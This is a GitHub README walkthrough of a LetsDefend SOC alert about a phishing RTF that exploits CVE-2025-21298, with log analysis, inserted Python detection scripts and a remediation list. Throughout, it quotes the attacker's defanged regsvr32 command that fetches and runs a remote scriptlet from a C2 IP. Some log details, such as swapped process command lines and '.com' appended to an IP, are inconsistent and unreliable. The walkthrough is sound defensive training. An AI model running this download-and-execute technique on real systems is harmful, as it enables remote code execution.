abc1230940/SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

GitHub: abc1230940/SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

Stars: 0 | Forks: 0

SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298) Walkthrough

🔎 Table of Contents
  1. Situation
  2. Alert Overview
  3. Tools Used
  4. Analysis
  5. Playbook
  6. Analyst Note
  7. Reference

Situation

One of our employees, Austin, received a phishing email from a suspicious sender, and an alert was triggered after he opened the email in Outlook on Feb 04, 2025 at 04:18 PM. The trigger reason was "Malicious RTF attachment identified with known CVE-2025-21298 exploit pattern".

Alert Overview

EventID : 314

Event Time : Feb, 04, 2025, 04:18 PM (I think it was wrong)

Rule : SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)

Level : Security Analyst

SMTP Address : 84.38.130.118

Source Address : projectmanagement@pm.me

Destination Address : Austin@letsdefend.io

E-mail Subject : Important: Action Required for Upcoming Project Deadline

Attachment : mail.rtf

Attachment Hash : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

Device Action : Allowed

Trigger Reason : Malicious RTF attachment identified with known CVE-2025-21298 exploit pattern.

Tools Used

  1. VirusTotal
  2. AbuseIPDB
  3. Gemini

Analysis

Let's dig into the Email Security, Log Management and Endpoint Security logs for the alert triage.

Email Security

I searched for the sender address projectmanagement@pm[.]me and opened the email "Important: Action Required for Upcoming Project Deadline", sent at 05:12 AM on the same day. The urgent tone and wording such as "Important" and "Action Required" already pointed me towards a phishing email.

I searched the domain pm[.]me on VirusTotal and only 1 vendor flagged it as suspicious.

However, when I searched the SMTP address 84[.]38[.]130[.]118, 7 vendors flagged it as Malicious and Malware, and it was related to a Sliver C2 server.

84[.]38[.]130[.]118 was also found in the AbuseIPDB database. It is located in Riga, Riga, Latvia, belongs to the domain name rixhost.lv, and is categorized as DDoS Attack, Hacking and Exploited Host.

Finally, I searched the hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 of the attachment mail.rtf on VirusTotal, and 29 out of 61 vendors flagged the attachment as malicious. It belongs to the malware family rtfmalformb and is associated with the vulnerability CVE-2025-21298.

It was confirmed that a phishing email with a malicious attachment was sent to Austin.

Log Management

Let's investigate whether there were suspicious activities after 05:12 AM, when Austin opened the phishing email.

Proxy Log

I first checked the proxy log and searched for the malicious sender IP address 84[.]38[.]130[.]118, discovering that at 08:06 AM there was an HTTP GET request to the malicious IP address with the URL hxxp://84[.]38[.]130[.]118/shell[.]sct, initiated by cmd.exe, downloading a Windows scriptlet file. The response code was 200 OK, indicating that the outbound traffic was allowed and not blocked by the firewall. It was unusual to fetch a script file, which possibly contained a reverse shell script.
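To show how this proxy-log check can be automated, here is an added example (my own code, not part of the original walkthrough or of any LetsDefend tooling). It refangs the IoCs exactly as the report lists them, then scans constructed proxy log lines in an assumed space-separated format for requests to the sender IP, for any .sct scriptlet download, and for requesting processes such as cmd.exe that should not normally talk to the internet.

```python
"""Scan proxy log lines for the indicators seen in this alert: requests to the
malicious IP, a download of a Windows scriptlet (.sct) file, and an unusual
requesting process such as cmd.exe. Assumed log format (constructed for this
example): '<date> <time> <src_ip> <method> <url> <status> <process>'."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample proxy log; only the second line reproduces the request
# described in the walkthrough (GET of shell.sct from the sender IP by cmd.exe).
SAMPLE_PROXY_LOG = """\
2025-02-04 08:05:30 172.16.17.137 GET http://update.example.com/ok.json 200 chrome.exe
2025-02-04 08:06:11 172.16.17.137 GET http://84.38.130.118/shell.sct 200 cmd.exe
2025-02-04 08:07:02 172.16.17.137 GET http://intranet.example.local/index.html 200 msedge.exe
"""

# IoCs written defanged, the way the report lists them.
DEFANGED_IOCS = ["84[.]38[.]130[.]118", "hxxp://84[.]38[.]130[.]118/shell[.]sct"]

# Processes that should not normally be fetching content from the internet.
UNUSUAL_REQUESTERS = {"cmd.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<proc>\S+)$"
)


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('hxxp', '[.]', '[://]') back into a matchable string."""
    return (indicator.replace("[.]", ".")
                     .replace("[://]", "://")
                     .replace("hxxps", "https")
                     .replace("hxxp", "http"))


def host_of(url: str) -> str:
    """Extract the host part of 'scheme://host/path' (port stripped)."""
    return url.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]


@dataclass
class Finding:
    timestamp: str
    url: str
    process: str
    reasons: list[str]


def scan_proxy_log(log_text: str, defanged_iocs: list[str]) -> list[Finding]:
    """Return one Finding per log line that matches at least one suspicious condition."""
    bad_urls = {refang(i) for i in defanged_iocs if "://" in refang(i)}
    bad_hosts = {host_of(refang(i)) for i in defanged_iocs}
    findings: list[Finding] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        url, proc, status = m["url"], m["proc"], m["status"]
        reasons = []
        if url in bad_urls:
            reasons.append("URL matches IoC")
        if host_of(url) in bad_hosts:
            reasons.append("host matches IoC")
        if url.lower().split("?", 1)[0].endswith(".sct"):
            reasons.append("Windows scriptlet (.sct) download")
        if proc.lower() in UNUSUAL_REQUESTERS:
            reasons.append(f"unusual requesting process: {proc}")
        if reasons and status == "200":
            # A 200 means the proxy/firewall let the fetch through, as in this case.
            reasons.append("request succeeded (not blocked)")
        if reasons:
            findings.append(Finding(m["ts"], url, proc, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_PROXY_LOG, DEFANGED_IOCS):
        print(f.timestamp, f.process, f.url, "; ".join(f.reasons))
```

The .sct and requesting-process checks fire even when the IP is not yet on a blocklist, which is the point: the indicator-independent conditions catch the next campaign that uses a different host.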

Endpoint Security

Terminal History

Since the outbound traffic to the malicious IP address was initiated by cmd.exe, I first checked the terminal history and found that at 08:06:08 AM the command "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" was executed, spawning regsvr32.exe to fetch the script file from the malicious IP address via scrobj.dll.

  • regsvr32.exe: a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows Registry
  • /s: regsvr32.exe runs silently in the background
  • /u: forces Windows not to add this key to the Windows Registry
  • /i: interface
  • scrobj.dll: the Script Object Runtime Library, which handles scriptlet files

Using built-in Windows utilities to fetch the script can leave minimal traces on the system, making the reverse engineering and malware analysis process more difficult!

Network Action

It was confirmed that there was a connection to the malicious IP 84[.]38[.]130[.]118 at 08:06:42 AM, after the execution of the command.

Processes

So why was cmd.exe executed just by clicking an email? While no evidence was found of Austin downloading the malicious attachment mail.rtf, I checked the endpoint logs and searched for any event around 08:06 AM.

Process ID: 7023

Event time: Feb 04 2025 08:06:25

Commandline: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Parent Process: cmd.exe

OK, then let's look at the parent process, cmd.exe.

Process ID: 6784

Event time: Feb 04 2025 08:06:08

Commandline: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Parent Process: outlook.exe

And finally I checked the parent process of outlook.exe.

Process ID: 4820

Event time: Feb 04 2025 08:05:15

Commandline: "C:\Windows\System32\cmd.exe"

Parent Process: explorer.exe

So we can conclude the malicious processes in a tree:

explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:6784) -> regsvr32.exe (PID:7023) -> ! Execution of Script !

However, I still questioned how the malicious processes were initiated without downloading and opening the malicious attachment, and how outlook.exe spawned the malicious process, until I found the information about CVE-2025-21298.
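The process-tree reconstruction above is the kind of pivot a detection rule can do automatically. Here is an added example (my own code, not from the original walkthrough or any EDR vendor) that rebuilds parent/child chains from constructed process-creation events, using the PIDs and command line from this report, and flags regsvr32.exe loading scrobj.dll with a remote /i: URL. The severity is raised to critical when a mail client sits in the ancestry, which is exactly the zero-click shape seen here; the event format and the extra chrome.exe event are assumptions.

```python
"""Rebuild a process tree from endpoint process-creation events and flag the
outlook.exe -> cmd.exe -> regsvr32.exe remote-scriptlet chain described above."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    time: str


# Constructed sample events. PIDs, images and the regsvr32 command line mirror
# the report (URL refanged); the event shape and chrome.exe entry are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(1200, 0, "explorer.exe", "explorer.exe", "08:00:00"),
    ProcEvent(4820, 1200, "outlook.exe", "outlook.exe", "08:05:15"),
    ProcEvent(6784, 4820, "cmd.exe",
              r"C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u "
              r"/i:http://84.38.130.118/shell.sct scrobj.dll", "08:06:08"),
    ProcEvent(7023, 6784, "regsvr32.exe",
              "regsvr32.exe /s /u /i:http://84.38.130.118/shell.sct scrobj.dll", "08:06:25"),
    ProcEvent(7100, 1200, "chrome.exe", "chrome.exe --type=renderer", "08:06:30"),
]

# regsvr32 with /i: pointing at a URL and scrobj.dll as the DLL: the scriptlet
# is fetched from the network rather than loaded from disk.
REMOTE_SCRIPTLET_RE = re.compile(
    r"regsvr32(?:\.exe)?\b.*?/i:\s*(?:https?|ftp)://\S+.*?\bscrobj\.dll",
    re.IGNORECASE,
)

EMAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def is_remote_scriptlet_regsvr32(cmdline: str) -> bool:
    """True when regsvr32 is told to pull a scriptlet over the network."""
    return REMOTE_SCRIPTLET_RE.search(cmdline) is not None


def ancestry(by_pid: dict[int, ProcEvent], pid: int) -> list[ProcEvent]:
    """Walk parent links from pid up to the root; returned root-first.
    The 'seen' set guards against PID reuse creating a cycle."""
    chain: list[ProcEvent] = []
    seen: set[int] = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return list(reversed(chain))


def format_chain(chain: list[ProcEvent]) -> str:
    return " -> ".join(f"{p.image} (PID:{p.pid})" for p in chain)


def detect(events: list[ProcEvent]) -> list[dict]:
    """One finding per regsvr32.exe process whose command line fetches a remote scriptlet."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        # Match on the regsvr32 process itself so the cmd.exe /c wrapper is not double-counted.
        if e.image.lower() != "regsvr32.exe" or not is_remote_scriptlet_regsvr32(e.cmdline):
            continue
        chain = ancestry(by_pid, e.pid)
        parents = {p.image.lower() for p in chain[:-1]}
        if parents & EMAIL_CLIENTS:
            severity = "critical"  # spawned under a mail client: zero-click/preview shape
        elif parents & SHELLS:
            severity = "high"
        else:
            severity = "medium"
        findings.append({"pid": e.pid, "time": e.time, "severity": severity,
                         "chain": format_chain(chain)})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["time"], f["severity"].upper(), f["chain"])
```

The rule deliberately keys on the command-line shape (remote /i: plus scrobj.dll) rather than on the IP, so it still matches when the payload host changes, while the ancestry walk gives the analyst the same tree that was assembled by hand above.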

CVE-2025-21298

According to the article from OffSec, in January 2025 a critical Windows OLE zero-click vulnerability enabling RCE via email was disclosed, with a CVSS score of 9.8. When the targeted recipient merely opens or previews the malicious email in Microsoft Outlook, containing a harmful RTF document with an embedded script, the vulnerability is triggered, allowing the attacker to execute arbitrary code on the affected system.

I did some research on Windows OLE and how the RTF document hijacks the process, using Google and Gemini, and related it to my knowledge of reverse engineering:

  1. When the RTF document is opened or previewed, the UtOlePresStmToContentsStm function inside ole32.dll handles an OLE object pointed to by pstmContents to read the thumbnail image data (OlePres) and dump it into the actual data file (CONTENT).
  2. The function immediately hits an unexpected processing error due to the corrupted format of the attacker's RTF file, causing the deletion of the OLE object but not of the pstmContents pointer.
  3. The malicious RTF file then creates a malicious OLE object containing the malicious code, exactly the same size as the deleted OLE object, filling the same memory space still pointed to by the pstmContents pointer.
  4. After Outlook finishes previewing, it runs the fake "clean-up" routine containing the malicious code "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" inside the malicious fake OLE object.
  5. The victim's system executes the remote payload and establishes a reverse shell automatically, without any clicks.

Playbook

Playbook answers:

  • Not Quarantined
  • Malicious
  • Accessed

Analyst Note

Classification: Critical

Type: Malware

Time of Activity:

Feb, 04, 2025, 05:12 AM (Phishing email received)

Feb, 04, 2025, 08:05:15 AM - Feb, 04, 2025, 08:06:42 AM (Phishing email opened and malicious code executed)

Affected Entities:

Source Address: projectmanagement@pm[.]me

SMTP Address: 84[.]38[.]130[.]118

Recipient Email Address: Austin@letsdefend[.]io

Recipient IP Address: 172[.]16[.]17[.]137

Hostname: Austin

Reasons for True positive:

On Feb 04, 2025 at 05:12 AM a suspicious email with the subject "Important: Action Required for Upcoming Project Deadline" was sent from projectmanagement@pm.me (IP address: 84.38.130.118) to austin@letsdefend.io (IP address: 172.16.17.137) with an attachment mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). The urgent tone and wording used in the subject pointed towards a phishing email. The threat intelligence sources VirusTotal and AbuseIPDB flagged the sender IP address, located in Riga, Riga, Latvia and belonging to the domain name rixhost.lv, and the attachment as malicious and malware.

According to the proxy logs, at 08:06 AM there was an HTTP GET request to the malicious IP address with the URL hxxp://84[.]38[.]130[.]118/shell[.]sct, initiated by cmd.exe, downloading a Windows scriptlet file. The response code was 200 OK, indicating that the outbound traffic to the malicious IP address was allowed and not blocked by the firewall.

According to the Endpoint Security logs, the malicious command "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) was initiated by cmd.exe (PID: 6784), spawned from outlook.exe (PID: 4820).

The exploitation was caused by a critical Windows OLE zero-click vulnerability (CVE-2025-21298), disclosed in January 2025 with a CVSS score of 9.8, enabling RCE via email. When the targeted recipient merely opens or previews the malicious email in Microsoft Outlook, containing a harmful RTF document with an embedded script, the vulnerability is triggered, allowing the attacker to execute arbitrary code on the affected system and potentially establish a reverse shell to the C2 server.

Reasons for escalation:

While active post-exploitation C2 network traffic has not yet been definitively observed, the endpoint security logs confirmed the execution of regsvr32.exe using scrobj.dll to fetch the scriptlet file shell.sct. Given the CVSS score of 9.8 for CVE-2025-21298, further investigation is required to check for any suspicious activity on the host, such as persistence or data exfiltration.

Remediations:

  • Immediately disconnect the host Austin from the corporate internal network
  • Terminate the process "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" and its related processes cmd.exe and outlook.exe
  • Block the outbound traffic to 84[.]38[.]130[.]118
  • Blacklist the domain rixhost[.]lv
  • Blacklist the sender projectmanagement@pm[.]me on the email server
  • Patch the vulnerability CVE-2025-21298
  • Reset the credentials of Austin
  • Perform memory analysis on the host Austin to investigate malicious activities such as C2 connection, persistence and data exfiltration after the execution of shell.sct
  • Perform reverse engineering on shell.sct
  • Perform email header analysis to investigate the originating IP and return address
  • Block internet access initiated by regsvr32.exe
  • Conduct a phishing awareness campaign to educate employees not to open emails from unknown senders or with an urgent tone or wording

Indicators of Compromise:

  • Sender address: projectmanagement@pm[.]me
  • Sender IP Address: 84[.]38[.]130[.]118
  • Sender Domain: rixhost[.]lv
  • Phishing Email: "Important: Action Required for Upcoming Project Deadline"
  • Malicious document: mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
  • Malicious process tree: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
  • URL to second payload: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

Reference

CVE-2025-21298 Detail

CVE-2025-21298: A Critical Windows OLE Zero-Click Vulnerability
